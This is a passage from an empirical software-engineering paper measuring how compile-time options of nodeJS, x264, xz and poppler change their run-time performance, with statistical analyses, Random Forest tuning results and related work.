 2: Input $C$ compile-time configurations
 3: Input $R$ run-time configurations
 4: Input $I$ system inputs
 5: // The input choices for each system are listed in Table 1
 6: Init $P$ performance measurements of $S$
 7: Download the source code of $S$
 8: for each compile-time configuration $c \in C$ do
 9:     Compile source code of $S$ with $c$ arguments
10:     for each input $i \in I$ do
11:         for each run-time configuration $r \in R$ do
12:             Execute the compiled code with $r$ on the input $i$ and record its performance in $P$
13:         end for
14:     end for
15: end for
16: Output $P$
```

Lines 1-4. First, we define the different inputs fed to the algorithm, the first one being the configurable system $S$ we study. Then, we provide a set of compile-time configurations $C$, as well as a set of run-time configurations $R$ related to the configurable system $S$. Finally, we consider a set of input data $I$, processed by the configurable system $S$. Lines 5-6. Then, we initialize the matrix of performances $P$. Line 7. We download the source code of $S$ (via the command line 'git clone'), w.r.t. the link and the commits referenced in Table 1. We keep the same version of the system for all our experiments. If needed, we ran the scripts (e.g., autogen.sh for xz) generating the compilation files, thus enabling the manual configuration of the compilation. Lines 8-15. We apply the following process to all the compile-time configurations of $C$: based on a compile-time configuration $c$, we compile the software $S$, (de-)activating the set of options of $c$. Then, we measure the performances of the compiled $S$ when executing it on all inputs of $I$ with the different run-time configurations of $R$. Line 16. We store the results in the matrix of performances $P$ (in CSV files). We then use these measurements to generate the results for answering the research questions (see Section 4).
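The nested measurement loop of the protocol can be sketched in a few lines; `compile_system` and `measure` below are hypothetical stand-ins for the actual build and benchmark commands:

```python
# Sketch of the measurement protocol: nested loops over compile-time
# configurations, inputs, and run-time configurations.
# `compile_system` and `measure` are hypothetical placeholders for the
# real build (./configure ... && make) and benchmark steps.

def compile_system(c):
    return ("binary", c)            # stand-in for the compiled executable

def measure(binary, r, i):
    return 1.0                      # stand-in for timing the execution

def run_protocol(C, R, I):
    P = {}                          # performance matrix P[c, r, i]
    for c in C:                     # for each compile-time configuration
        binary = compile_system(c)
        for i in I:                 # for each input
            for r in R:             # for each run-time configuration
                P[(c, r, i)] = measure(binary, r, i)
    return P

P = run_protocol(C=["default", "--enable-lto"], R=["r1", "r2"], I=["bench.js"])
print(len(P))  # 2 compile-time configs x 2 run-time configs x 1 input = 4
```

The resulting dictionary plays the role of the matrix $P$ stored as CSV files in the actual protocol.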
#### 3.2.2 Replication To allow researchers to easily reproduce our experiments, we provide Docker containers for each configurable system. The links are listed in Table 1 in the "Docker" column. #### 3.2.3 Hardware To avoid introducing a bias in the experiment, we measure all performances sequentially on the same server (model Intel(R) Xeon(R) CPU D-1520 @ 2.20GHz, running Ubuntu 20.04 LTS). This server was dedicated to this task, so we can ensure there is no interaction with any other process running at the same time. ### 3.3 Analyzing run-time performances We split RQ1. Do compile-time options change the performance distributions of configurable systems? into two sub-questions. #### RQ1.1. Do the run-time performances of configurable systems vary with compile-time options? A first goal of this paper is to determine whether the compile-time options affect the run-time performances of configurable systems. To do so, we compute and analyze the distribution of all the different compile-time configurations for each run-time execution of the software system (i.e., given an input $i$ and a run-time configuration $r$, the distribution of $P[c, r, i]$ for all the compile-time configurations $c$ of $S$). All else being equal, if the compile-time options have no influence over the different executions of the system, these distributions should exhibit little variation. In other words, the bigger the variation of these distributions, the greater the effect of the compile-time options on run-time performances. To visualize these variations, we first display the boxplots of several run-time performances for a few systems in Figure 2. Note that for x264 (Figures 2a and 2c), only an excerpt of 30 configurations is depicted. We then comment on the values of the InterQuartile Range (i.e., IQR, the difference between the third and the first quartile of a distribution) for each pair of system $S$ and performance $P$.
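The IQR-based dispersion analysis can be sketched as follows; the timing values are hypothetical and the linear-interpolation quantile convention is one common choice among several:

```python
# Sketch: interquartile range (IQR) of a performance distribution,
# i.e., the spread of measurements across compile-time configurations
# for one fixed (run-time configuration, input) pair.

def quartile(sorted_xs, q):
    """Linear-interpolation quantile over an already sorted list."""
    pos = q * (len(sorted_xs) - 1)
    lo = int(pos)
    frac = pos - lo
    if lo + 1 < len(sorted_xs):
        return sorted_xs[lo] * (1 - frac) + sorted_xs[lo + 1] * frac
    return sorted_xs[lo]

def iqr(xs):
    s = sorted(xs)
    return quartile(s, 0.75) - quartile(s, 0.25)

# Hypothetical encoding times (s) of one run-time configuration
# under five different compile-time configurations:
times = [2.58, 2.60, 2.61, 2.63, 2.66]
print(iqr(times))  # spread across compile-time configurations (~0.03 s)
```

A near-zero IQR means the compile-time options barely affect that execution; a large IQR flags a (run-time configuration, input) pair sensitive to the compilation.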
In order to state whether these variations are consistent across compile-time configurations, we then apply Wilcoxon signed-rank tests [52] (significance level of 0.05) to distributions of run-time performances, and report on the performances leading to significant differences. This test is suited to our case since our performance distributions are quantitative, paired, not normally distributed and have unequal variances. #### RQ1.2. How much performance can we gain/lose when changing the default compile-time configuration? As an outcome of RQ1.1, we isolate a few pairs (system, performance) for which the way we compile the system significantly changes its run-time performances. But how much performance can we expect to gain or lose when switching from the default configuration (i.e., the compilation processed without argument, with the simple command line ./configure) to another configuration? In other words, RQ1.2 asks whether it is worth changing the default compile-time configuration in terms of run-time performances. Moreover, RQ1.2 tries to estimate the benefit of manually tuning the compile-time options to increase software performances. To quantify this gain (or loss), we compute the ratios between the run-time performances of each compile-time configuration and the run-time performances of the default compile-time configuration. A ratio of 1 for a compile-time configuration suggests that its run-time performances are always equal to the run-time performances of the default compile-time configuration. Intuitively, if the ratio is close to 1, the effect of compile-time options is not important. An average performance ratio of 2 corresponds to a compile-time configuration whose run-time performances are on average twice the default compile-time configuration's performances. Section 4 details the average values and the standard deviations of these ratios for each input (row) and each pair of system and performance (column) kept from RQ1.1.
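The ratio computation reduces to an element-wise division followed by summary statistics; a minimal sketch with hypothetical measurements:

```python
# Sketch: run-time performance ratios w.r.t. the default compile-time
# configuration, summarized as mean and standard deviation.
# The measurement values below are hypothetical.
from statistics import mean, pstdev

def ratios_to_default(perfs, perfs_default):
    return [p / d for p, d in zip(perfs, perfs_default)]

default = [10.0, 20.0, 30.0]        # default ./configure build
tuned   = [12.0, 24.0, 36.0]        # some other compile-time configuration

r = ratios_to_default(tuned, default)
print(mean(r), pstdev(r))  # constant ratio of 1.2, so the std is 0.0
```

A mean ratio far from 1 signals a global performance shift; a large standard deviation signals that the shift depends on the run-time configuration.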
We add the standard deviation of run-time performance distributions to estimate the overall variations of run-time performances due to the change of compile-time options. To complete this analysis, and as an extreme case, we also computed the best ratio values in Section 4. By best ratio, we refer to the minimal ratio for the time (e.g., reduction of the encoding time for x264 or the compression time for xz) and the maximal ratio for the operation rate (i.e., increase of the number of operations executed per second for nodeJS) and the number of encoded fps (x264). As for Section 4, the best ratios are displayed for each input. 3.4 Studying the interplay of compile- and run-time options RQ1 highlights a few systems and performances for which we can increase the performances by tuning their compile-time options. Now, how to carry out this tuning process and choose the right option values to tune the performances of a software system is a problem to address. In short: RQ2. How to tune software performances at the compile-time level? Again, we split this question into two parts. RQ2.1. Do compile-time options interact with the run-time options? Before tuning the software, we have to deeply understand how the different levels (here the run-time level and the compile-time level) interact with each other. The protocol of RQ1 states whether the compile-time options change the performances, but the compilation could just change the scale of the distribution, i.e., without really interacting with the run-time options. To discover such interactions, we compute the Spearman correlations [26] between the run-time performance distributions of software systems compiled with different configurations. The Spearman correlation allows us to measure whether the way we compile the system changes the rankings of the run-time performances.
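Spearman correlation is the Pearson correlation computed on ranks; a self-contained sketch with hypothetical measurement values:

```python
# Sketch: Spearman rank correlation between two run-time performance
# distributions measured under two different compile-time configurations.
# A correlation far from 1 would hint at a compile-/run-time interplay.

def ranks(xs):
    """Average ranks (1-based), handling ties."""
    order = sorted(range(len(xs)), key=lambda k: xs[k])
    rk = [0.0] * len(xs)
    i = 0
    while i < len(order):
        j = i
        while j + 1 < len(order) and xs[order[j + 1]] == xs[order[i]]:
            j += 1
        avg = (i + j) / 2 + 1          # average rank of the tied block
        for k in order[i:j + 1]:
            rk[k] = avg
        i = j + 1
    return rk

def spearman(xs, ys):
    rx, ry = ranks(xs), ranks(ys)
    n = len(xs)
    mx, my = sum(rx) / n, sum(ry) / n
    cov = sum((a - mx) * (b - my) for a, b in zip(rx, ry))
    vx = sum((a - mx) ** 2 for a in rx) ** 0.5
    vy = sum((b - my) ** 2 for b in ry) ** 0.5
    return cov / (vx * vy)

perf_c1 = [5.0, 7.0, 9.0, 11.0]
perf_c2 = [50.0, 70.0, 90.0, 110.0]    # same ranking, different scale
print(spearman(perf_c1, perf_c2))      # close to 1.0: rankings preserved
```

In real analyses, a library routine such as `scipy.stats.spearmanr` would be used; the hand-rolled version only illustrates the ranking argument.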
All else being equal, finding that two performance distributions, having the same run-time configurations but different compile-time configurations, are uncorrelated proves the existence of an interplay between the compile- and the run-time options. We depict a correlogram in Figure 3a. Each square (i, j) represents the Spearman correlation between the run-time performances of the compile-time configurations C#i and C#j. The color of this square respects the top-left scale: high positive correlations in red; low correlations in white; negative correlations in blue. Because we cannot describe each correlation individually, we added a table describing the distribution of the correlations (diagonal excluded). We apply the Evans rule [13] when interpreting these correlations. In absolute value, we refer to correlations by the following labels: very low: 0-0.19, low: 0.2-0.39, moderate: 0.4-0.59, strong: 0.6-0.79, very strong: 0.8-1.00. To complete this analysis, we train a Random Forest Regressor [42] on our measurements so that it predicts the operation rate of nodeJS for a given input $i \in I$. We feed this ensemble of trees with all the configuration options, i.e., all the compile-time options of $C$ and the run-time options of $R$ related to the performances $P$ are used as predictor variables in this model. We then report the feature importances [8, 36, 43] for the different options (run-time or compile-time) in Figure 3b. Intuitively, a feature is important if shuffling its values increases the prediction error. Note that each Random Forest only predicts the performances $P$ for a given input. The idea of this graph is to show the relative importances of the compile-time options, compared to the run-time options. RQ2.2. How to use these interactions to find a set of good compile-time options and tune the configurable system? RQ2.1 exhibits interactions between the compile-time options and the run-time options.
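The shuffling-based notion of feature importance can be illustrated with a hand-rolled sketch; the data and the tiny lookup-table "model" below are hypothetical, and a real experiment would permute columns randomly and use a Random Forest (e.g., scikit-learn's):

```python
# Sketch: permutation feature importance on hypothetical measurements.
# y (performance) depends on the boolean option x0 and not on x1;
# permuting an important column should increase the prediction error.

# Hypothetical configurations (x0, x1) and measured performances y.
X = [(0, 0), (0, 1), (1, 0), (1, 1), (0, 0), (1, 1), (1, 0), (0, 1)]
y = [2.0, 2.0, 10.0, 10.0, 2.0, 10.0, 10.0, 2.0]

# "Model": average performance per configuration (a tiny decision table).
table = {}
for cfg, p in zip(X, y):
    table.setdefault(cfg, []).append(p)
model = {cfg: sum(ps) / len(ps) for cfg, ps in table.items()}

def mse(rows):
    return sum((model[cfg] - p) ** 2 for cfg, p in zip(rows, y)) / len(y)

def permutation_importance(col):
    # Replace the column by a permutation of itself (here: reversed,
    # for determinism; real implementations shuffle randomly).
    permuted = [row[col] for row in X][::-1]
    rows = [(v, row[1]) if col == 0 else (row[0], v)
            for v, row in zip(permuted, X)]
    return mse(rows) - mse(X)

imp_x0 = permutation_importance(0)
imp_x1 = permutation_importance(1)
print(imp_x0, imp_x1)  # permuting x0 hurts; permuting x1 does not
```

The same logic, applied to mixed compile-time and run-time options, is what makes the relative importances of Figure 3b comparable across the two levels.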
Now, the goal is to be able to use these interactions to find a good configuration in order to optimize the performances. As in RQ2.1, we used a Random Forest Regressor [42] to predict the operation rate of nodeJS. For this research question, we split our dataset of measurements in two parts, one training part and one test part. The goal is then to use the Random Forest Regressor to predict the performance of the configurations of the test set, and then keep the one leading to the best performances. In order to estimate how many measurements we need to predict a good configuration, we vary the training size (with 1 %, 5 % and 10 % of the data). We also compute the best configuration of our dataset, i.e., the one that would be predicted by an oracle. We then compare the obtained configuration with the default configuration of nodeJS (i.e., the most common usage: the command line without argument, on a version of nodeJS compiled without argument). We plot the performance ratios between the predicted configuration and the default configuration of node for each input in Section 4. A performance ratio of 1.5 suggests that we found a configuration increasing the performance of the default configuration by 1.5 − 1 = 50 %. 4 EVALUATION Let us answer RQ1.1. Do the run-time performances of configurable systems vary with compile-time options? by distinguishing performance properties. First, the size is an extreme case of a stable performance that does not vary at all with the different compile-time options. As shown for the size of the encoded sports video in Figure 2a (boxplots), it stays the same for all compile-time configurations, leading to an average IQR of 2.3 kB, negligible in comparison to the average size (3.02 MB). This conclusion applies to all the sizes we measured: the size of the compressed file for xz (e.g., an IQR of 2.6 kB for I#8, which has an average size of 2.85 MB) and the size of the image folder for poppler (e.g., IQR = 16 kB, avg = 2.36 MB for I#2).
For the size of x264, 46 % of the Wilcoxon tests could not be computed because the run-time distributions were equal (i.e., same values for all sizes). The variation of the time depends on the considered system. Overall, for the execution time of poppler, it is stable (e.g., 29 ms for an execution of 2.6 s). For xz, and as depicted in Figure 2b, it seems to also depend on the run-time configurations. For instance, the distribution of the first run-time configuration (i.e., R#1) executed on I#5 has an IQR of 40 ms, but this number increases to 0.37 s for the distribution of R#9. For the encoding time of x264 and the input I#4, we can draw the same conclusion; suddenly, for a given run-time configuration (e.g., from R#102 to R#103) the execution times increase not only on average (from 0.9 s to 133 s), but also in terms of variations w.r.t. the compile-time options (IQR from 1.0 s to 223 s). Since the number of frames for a given video is fixed, these conclusions are also valid for the number of encoded fps (x264).

Luc Lesoil, Mathieu Acher, Xhevahire Ternava, Arnaud Blouin, Jean-Marc Jézéquel

For the number of operations executed per second (nodeJS), the IQR values of the performance distributions are high: e.g., for I#3, as shown in Figure 2d, 19 operations per second on average, for an average of 83 operations per second. However, unlike x264, these variations are quite stable across the different run-time configurations. A Wilcoxon test confirms a significant difference between the run-time distributions of C#1 and C#11 (p = 4.28 * 10^-6) or C#4 and C#7 (p = 1.24 * 10^-3). **Key findings for RQ1.1.** The sizes of software systems do not depend on the compile-time options for our 3 cases. However, other performance properties such as the time or the number of operations per second can vary with different compile-time options. **RQ1.2.
How much performance can we gain/lose when changing the default compile-time configuration?** As a follow-up of RQ1.1, we computed the gain/loss ratios for the sizes of poppler, x264 and xz. They are all around 1.00 on average, and below 0.01 in terms of standard deviation, whatever the input is. The same applies to poppler and to xz and their execution times, as shown in Section 4. There are few variations: less than 3 % standard deviation over all inputs for poppler. For xz and time, we can observe the same trend. But we can also observe an input sensitivity effect: for some inputs, like I#2 or I#11, the performances vary in comparison to the default one (stds at 0.48 and 0.23). Maybe the combination of an input and a compile-time option can alter the software performances. Overall, there is room for improvement when changing the default compile-time options. For example, with the operation rate of nodeJS, the average performance ratio is under 1 (e.g., 0.86 for I#3, 0.8 for I#1 and I#10). Compared to the default compile-time configuration of nodeJS, our choices of compilation options decrease the performances by about 20 %. Besides, the standard deviations are relatively high: the run-time performance ratios can vary by 41 % across compile-time options for I#5, or by 11 % for I#4. So it can be worse than losing only 20 % of operations per second. However, for I#8, there exists a run-time configuration for which we can more than double (i.e., multiply by 2.28) the number of operations per second just by changing the compile-time options of nodeJS. We can draw the same conclusions for the execution time of x264: our compile-time configurations are not effective: encoding takes more than three times as long as with the default configuration for all the inputs. But in this case, the best we can get is a decrease of 10 % of the execution time, which will not have a great impact on the overall performances.
We can formulate a hypothesis with Figure 2c to explain these bad results: maybe a few run-time configurations (e.g., R#103 to R#109) take a lot of time to execute, thus increasing the overall average of performance ratios. Here, it would be an interaction between the run-time options and the compile-time options. **Key findings for RQ1.2.** Depending on the performance we consider, it may or may not be worth changing the compile-time options. For nodeJS, changing the default configuration can increase the operation rate by up to 128 %. For x264, we can gain about 10 % of execution time with the tuning of compile-time options. **RQ1. Do compile-time options change the performance distributions of configurable systems?** Properties like size are extremely stable when changing the compile-time options. Performance models predicting the sizes can be generalized over different compile-time configurations. However, we found other performances, like the operation rate for nodeJS, or the execution time for xz, that are sensitive to compile-time options. It is worth tuning the compile-time options to optimize these performances. **RQ2.1. Do compile-time options interact with the run-time options?** For x264 and xz, there are few differences between the run-time distributions. As an illustration of this claim, for all the execution time distributions of x264, and all the input videos, the worst correlation is greater than 0.97 (>0.999 for x264 and encoded size, 0.55 for xz and time). This result shows that, even if the compile-time options of these systems change the scale of the distribution, they do not change the rankings of run-time configurations (i.e., they do not truly interact with the run-time options). Then, we study the rankings of the run-time operation rate for nodeJS for different compile-time configurations, detailed in Figure 3a. The first results are also positive.
There is a large number of compile-time configurations (top-left part of the correlogram) for which the run-time performances are moderately, strongly or even very strongly correlated. For instance, the compile-time configuration C#16 is very strongly (0.91) correlated with C#24 in terms of run-time performances. Similarly, compile-time configurations C#40 and C#23 are strongly correlated (0.73). There are less favorable cases when looking at the middle and right parts of the correlogram. For example, C#27 and C#13 are uncorrelated (i.e., a very low correlation of 0.01). Worse, switching from compile-time configuration C#8 to C#29 changes the rankings to such an extent that their run-time performances are negatively correlated (-0.35). In between, poppler's performance distributions are overall not sensitive to the change of compile-time options, except for the input I#3 (for which the correlations can be negative). To complete this analysis, we discuss Figure 3b. The feature importances for predicting the operation rate of nodeJS for I#3 are distributed among the different options, both the run-time and compile-time options. While this does not prove any interaction, it signifies that, to efficiently predict the operation rate, the algorithm has to somehow combine the different levels of options. For the input I#10, it is a bit different, since the only influential run-time option (i.e., the one that has a great importance) is jitless. When looking at a decision tree (see additional results in the companion repository), the first split of the tree uses in fact this run-time option jitless, and then splits the other branches with the compile-time options --v8-lite-mode and --fully-static. **Key findings for RQ2.1.** xz, poppler and x264's performance rankings are not sensitive to the change of compile-time options. On the other hand, nodeJS's performance rankings change at run time with different compile-time options, i.e., nodeJS's run-time options interact with its compile-time options.
<table>
<thead>
<tr>
<th>Inputs</th>
<th>Training size 0.01</th>
</tr>
</thead>
<tbody>
<tr><td>I#1</td><td>0.94</td></tr>
<tr><td>I#2</td><td>1.05</td></tr>
<tr><td>I#3</td><td>1.167</td></tr>
<tr><td>I#4</td><td>1.123</td></tr>
<tr><td>I#5</td><td>0.96</td></tr>
<tr><td>I#6</td><td>1.005</td></tr>
<tr><td>I#7</td><td>0.986</td></tr>
<tr><td>I#8</td><td>1.035</td></tr>
<tr><td>I#9</td><td>1.034</td></tr>
<tr><td>I#10</td><td>1.003</td></tr>
</tbody>
</table>

**Table 2:** Table of run-time performance ratios (compile-time configuration/default) per input. An average performance ratio of 1.4 suggests that the run-time performances of a compile-time configuration are on average 1.4 times greater than the run-time performances of the default compile-time configuration.

<table>
<thead>
<tr>
<th>S</th>
<th>nodeJS</th>
<th>poppler</th>
<th colspan="2">x264</th>
<th>xz</th>
</tr>
<tr>
<th></th>
<th>ops</th>
<th>time</th>
<th>fps</th>
<th>time</th>
<th>time</th>
</tr>
</thead>
<tbody>
<tr><td>I#1</td><td>0.8 ± 0.34</td><td>1.0 ± 0.02</td><td>0.59 ± 0.4</td><td>3.33 ± 2.4</td><td></td></tr>
<tr><td>I#2</td><td>0.79 ± 0.36</td><td>1.0 ± 0.01</td><td>0.59 ± 0.39</td><td>3.5 ± 2.53</td><td></td></tr>
<tr><td>I#3</td><td>0.86 ± 0.2</td><td>1.0 ± 0.01</td><td>0.59 ± 0.4</td><td>3.5 ± 2.57</td><td></td></tr>
<tr><td>I#4</td><td>1.01 ± 0.11</td><td>1.0 ± 0.01</td><td>0.6 ± 0.39</td><td>3.26 ± 2.37</td><td></td></tr>
<tr><td>I#5</td><td>0.73 ± 0.41</td><td>1.0 ± 0.01</td><td>0.59 ± 0.4</td><td>3.53 ± 2.62</td><td></td></tr>
<tr><td>I#6</td><td>1.05 ± 0.21</td><td>1.0 ± 0.02</td><td>0.6 ± 0.4</td><td>3.35 ± 2.49</td><td></td></tr>
<tr><td>I#7</td><td>0.98 ± 0.01</td><td>1.0 ± 0.07</td><td>0.58 ± 0.4</td><td>3.75 ± 2.8</td><td></td></tr>
<tr><td>I#8</td><td>0.84 ± 0.38</td><td>1.0 ± 0.01</td><td>0.59 ± 0.39</td><td>3.32 ± 2.37</td><td></td></tr>
<tr><td>I#9</td><td>1.01 ± 0.02</td><td>1.0 ± 0.02</td><td></td><td></td><td>1.01 ± 0.02</td></tr>
<tr><td>I#10</td><td>0.8 ± 0.34</td><td>0.99 ± 0.03</td><td></td><td></td><td>1.04 ± 0.11</td></tr>
<tr><td>I#11</td><td></td><td></td><td></td><td></td><td>1.08 ± 0.23</td></tr>
<tr><td>I#12</td><td></td><td></td><td></td><td></td><td>1.02 ± 0.04</td></tr>
</tbody>
</table>

(a) Average ± standard deviation (b) Best (min for time, max for ops & fps)

Our results on x264, xz, and poppler show that their performance distributions are remarkably stable whatever their compile-time options. That is, interactions between the two kinds of options are easy to manage. This is very good news for all approaches that try to build performance models using machine learning: if \( nb_c \) and \( nb_r \) are the numbers of boolean options present in \( C \) and \( R \), it makes it possible to reduce the learning space to something proportional to \( 2^{nb_c} + 2^{nb_r} \) instead of \( 2^{nb_c+nb_r} = 2^{nb_c} \times 2^{nb_r} \). There are three practical opportunities (that apply to x264, xz, and poppler): **Reuse of configuration knowledge:** transfer learning of prediction models boils down to applying a linear transformation among distributions. Users can also trust the documentation of run-time options, which stays consistent whatever the compile-time configuration is. **Tuning at lower cost:** finding the best compile-time configuration among all the possible ones allows one to immediately find the best configuration at run time. It is no longer necessary to measure many configurations at run time: the best one is transferred because of the linear relationship between compile-time configurations. Finding the best compile-time configuration is like solving a one-dimensional optimization problem: we simply compare the performances of different compilations operating on a fixed set of run-time configurations. Intuitively, it is enough to determine whether a compilation improves the performance of a limited set of run-time configurations.
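The reduction of the learning space can be illustrated numerically, assuming, say, 10 boolean options at each level:

```python
# Sketch: size of the learning space with and without the decomposition
# enabled by stable rankings (nb_c compile-time and nb_r run-time
# boolean options); the counts 10/10 are illustrative.
nb_c, nb_r = 10, 10
joint = 2 ** (nb_c + nb_r)           # 2^(nb_c + nb_r): all combinations
decomposed = 2 ** nb_c + 2 ** nb_r   # explore each layer separately
print(joint, decomposed)             # 1048576 vs 2048 candidate points
```

The gap widens exponentially with the number of options, which is what makes the decomposition attractive for sampling strategies.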
Theoretically, it is possible to compare the compilations' performance on a single run-time configuration. In practice, we expect to measure \( r' \) run-time configurations with \( r' \ll 2^{nb_r} \). **Measuring at lower cost:** a common practice to measure run-time configurations is to use a default compile-time configuration. However, RQ1 results showed that it is possible to accelerate the execution time and thus drastically reduce the computational cost of measurements. That is, instead of using a default ./configure, we can use a compile-time configuration that is optimal w.r.t. cost. Then, owing to the results of RQ2.1, the measurements will transfer to any compile-time configuration and are representative of the run-time configuration space. The minimisation of the time is an example of a cost criterion; other properties such as memory or energy consumption can also be considered. It is even possible to use two compile-time configurations and executable binaries: (1) a first one to measure at lower cost and gather training samples; (2) a second one that is optimal for tuning a performance. However, for nodeJS, it requires additional effort (as shown in Section 4). If we had access to an oracle, we could search for the best configuration of our dataset (in terms of performance), and replace the default configuration by this one. Depending on the input script, it will improve (or not) the performances. For instance, with the input I#2, we can expect to gain about 10 % of performance, while for I#9 and I#10, it would be only 4 %. The worst case is without question I#7, for which we lose about 1 % of operation rate. But for inputs I#3 and I#4, it increases the performances by respectively 50 % and 25 %. We see these cases as proofs of concept; we can use the variability induced by the compile-time options to increase the overall performances of the default configuration.
And if we do not have much data, it is still possible to learn: with only 1 % of the measurements, we can expect to gain 16 % of performance on I#3. It steps up to a ratio of 1.37 for 5 % of the measurements used in the training. The same applies for the input I#4: 12 % of gain for 1 % of the measurements and 23 % for 5 %. **Key findings for RQ2.2.** We can use the interactions between the compile-time and the run-time options to increase the default configuration's operation rate of nodeJS (up to 50 % for I#3). **RQ2. How to tune software performances at the compile-time level?** Two types of systems are emerging: if the run-time options of a software system are not sensitive to compile-time options (e.g., for x264, xz, and most of the time poppler), there is an opportunity to tune "once and for all" the compilation layer, both improving the run-time performances and reducing the cost of measuring. However, for nodeJS and one specific input of poppler, we found interactions between the run-time and compile-time options, changing the rankings of their run-time performance distributions. We show that we can overcome this problem with a simple performance model that uses these interactions to outperform the default configuration of nodeJS. #### 5 DISCUSSION **Impacts for practitioners and researchers.** For the benefit of software variability practitioners and researchers, we give an estimate of the potential impact of tuning software during compilation. We also provide hints to choose the right values of options before compiling software systems (see RQ2.2). This may be of particular interest to developers responsible for compiling software into packages (e.g., for apt or dnf). For engineers who build performance models or test the performance of software systems, we show there are opportunities to decrease the underlying cost of tuning or measuring run-time configurations.
We also warn that performance models may not generalize, depending on the software and the performance property studied (as shown in our study). At this stage of the research, it is hard to anticipate such situations; we therefore recommend that practitioners verify the sensitivity of performance models w.r.t. compile-time options. Our results are also good news for researchers who build performance models using machine learning. Many works have experimented with x264 [3, 19, 53], and we show that for this system the performance is remarkably stable. xz, considered in [37], also falls into this category. That is, there is no threat to validity w.r.t. compile-time options. To the best of our knowledge, the other systems (nodeJS and poppler) have not been considered in the literature on configurable systems [44]. Hence, we warn researchers that there can be cases for which this threat applies.

**Understanding the interplay.** Our results suggest that compile-time options affect specific non-functional properties of software systems. The cause of this interplay between compile-time and run-time options is unclear, even to the authors of this paper. The results could be related to the system’s domain, or to the way it processes input data; trying to characterize the software systems sensitive to compile-time options (i.e., without measuring their performance) is challenging, but worth looking at. We look forward to discussing with developers why the interplay appears in these cases and not in the other software systems (left as future work).

**Other variability factors.** Compile-time options are one layer that can affect performance, but not the only one. Could we, in the same way, demonstrate an effect of the operating system on software performance? Of the hardware? This paper is also a way for us to alert researchers to factors of variability beyond software options, which may interact with performance.
We encourage researchers to highlight these factors in their work. Similarly, the four software systems are evolving, with new commits and features constantly added. A question then arises naturally: will this interplay evolve with the software? And if it changes with time and versions, how can we automate the update of our understanding of these interactions? This is another challenging layer and direction to explore. In our study design we consider compile-time options and not compiler flags. Though there is an overlap, many compile-time options are specific to a domain and system. As future work, we plan to investigate how compiler flags (e.g., -O2 and -O3 for gcc) relate to run-time configurations. More generally, the variability of interpreters and virtual machines [25, 32, 55] can be considered as yet another variability layer [33] on which we encourage researchers to perform experiments.

#### 6 RELATED WORK

**Machine learning and configurable systems.** Machine learning techniques have been widely used in the literature to learn software configuration spaces and non-functional properties of software product lines [15, 22, 23, 30, 38, 39, 41, 44, 47, 66, 67]. Several works have proposed to predict the performance of configurations, with several use-cases in mind for developers and users of configurable systems: the maintenance and interpretability of configuration spaces [54], the selection of an optimal configuration [15, 39, 41], the automated specialization of configurable systems [59], etc. Studies usually support learning models restricted to specific static settings (e.g., inputs, hardware, and version), such that a new prediction model may have to be learned from scratch or adapted once the environment changes. The studies of Valov et al. [64, 66] suggest that changing the hardware has a moderate impact, since linear functions are highly accurate when reusing prediction models.
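A minimal sketch of that linear reuse: performance measured in a source environment is mapped to a target environment by fitting \( y \approx ax + b \) with least squares. The hosts and numbers below are invented for illustration.

```python
# Linear model reuse across environments (in the spirit of Valov et al.):
# fit y ≈ a*x + b from paired measurements of the same configurations
# on two hosts, then transfer source measurements to the target.
# All data here is made up for illustration.

def fit_linear(xs, ys):
    """Ordinary least-squares fit of ys ≈ a*xs + b."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    a = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / \
        sum((x - mx) ** 2 for x in xs)
    return a, my - a * mx

# Same configurations measured on two hypothetical hardware platforms.
source = [10.0, 20.0, 30.0, 40.0]   # seconds on host A
target = [21.0, 41.0, 61.0, 81.0]   # seconds on host B (exactly 2x + 1 here)

a, b = fit_linear(source, target)
predicted = [a * x + b for x in source]   # transferred predictions for host B
```

On real measurements the fit is of course noisy; the point is only that a two-parameter function may suffice to reuse a model built in one environment.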
Netflix conducted a large-scale study comparing the compression performance of x264, x265, and libvpx over different inputs [1]. However, only two run-time configurations were considered, on a fixed compile-time configuration. Alterations in software version [16] and changes in operating system [18] have both been shown to cause variation in the results of a neuroimaging study. Jamshidi et al. [22] conducted an empirical study on four configurable systems (including x264), varying software configurations and environmental conditions such as hardware, input, and software versions. Pereira et al. [2] and Lesoil et al. [33] empirically report that inputs can change the performance distributions of a configurable system (x264). In our study, we purposely fix the hardware and the version in order to isolate the effects of compile-time options on run time. To the best of our knowledge, our large-scale study is the first to systematically investigate the effects of compile-time options on the performance of run-time configurations. The use of transfer learning techniques [23, 30, 38, 66] can be envisioned to adapt prediction models w.r.t. compile-time options. A key contribution of our study is to show that compile-time options can change the rankings of run-time options, thus preventing the reuse of a model predicting the best run-time configuration.

**Input sensitivity.** There are works addressing the performance analysis of software systems [11, 14, 17, 31, 46, 56] depending on different inputs (also called workloads). In our study, we also consider different inputs when measuring performance. In contrast to our work, existing studies consider a limited set of compile-time and run-time configurations (e.g., only default configurations). This is also a threat to validity, since compile-time options may change the performance distribution.
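That ranking argument can be checked mechanically: sort the run-time configurations by measured performance under each compile-time configuration and compare the orders. A small sketch with invented measurements (all names hypothetical):

```python
# Ranking-stability check: if the order of run-time configurations changes
# across compile-time configurations, a model that predicts the "best"
# run-time configuration cannot be reused as-is. Data is invented.

def ranking(perf):
    """Run-time configs sorted from best to worst (higher ops/s is better)."""
    return sorted(perf, key=perf.get, reverse=True)

# ops/s of three run-time configs under two compile-time configurations
under_default = {"rt1": 120.0, "rt2": 100.0, "rt3": 90.0}
under_tuned   = {"rt1": 110.0, "rt2": 140.0, "rt3": 95.0}

stable = ranking(under_default) == ranking(under_tuned)
# Here the best run-time config flips from rt1 to rt2, i.e. the
# compile-time layer interacts with the run-time layer.
```

A rank-correlation coefficient (e.g., Spearman or Kendall) over the two orders gives a graded version of the same test.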
In response, we perform an in-depth, controlled study of different systems, varying them in the large, both in terms of compile-time and run-time configurations and in terms of inputs. In our study, we show a strong effect of inputs on the interplay of compile- and run-time options: for some inputs, the interactions between the compilation and execution layers change nothing, while for others, ignoring them would be disastrous.

**Compiler optimizations.** The problem of choosing which optimizations of a compiler to apply has a long tradition [50]. Since the mid-1990s, machine-learning-based and evolutionary approaches have been investigated to explore the configuration space of compilers [5, 20, 45, 57, 58, 61, 62]. Such works usually consider a limited set of run-time configurations in favor of a broad consideration of inputs (programs). The goal is to understand the cost-effectiveness of compiler optimizations or to find tuning techniques for specific inputs and architectures. In contrast, our goal is to understand the interplay between compile-time options and run-time options, with possible consequences on the generalization of configuration knowledge. As discussed in Section 5, compiler flags are worth considering in future work in addition to compile-time options.

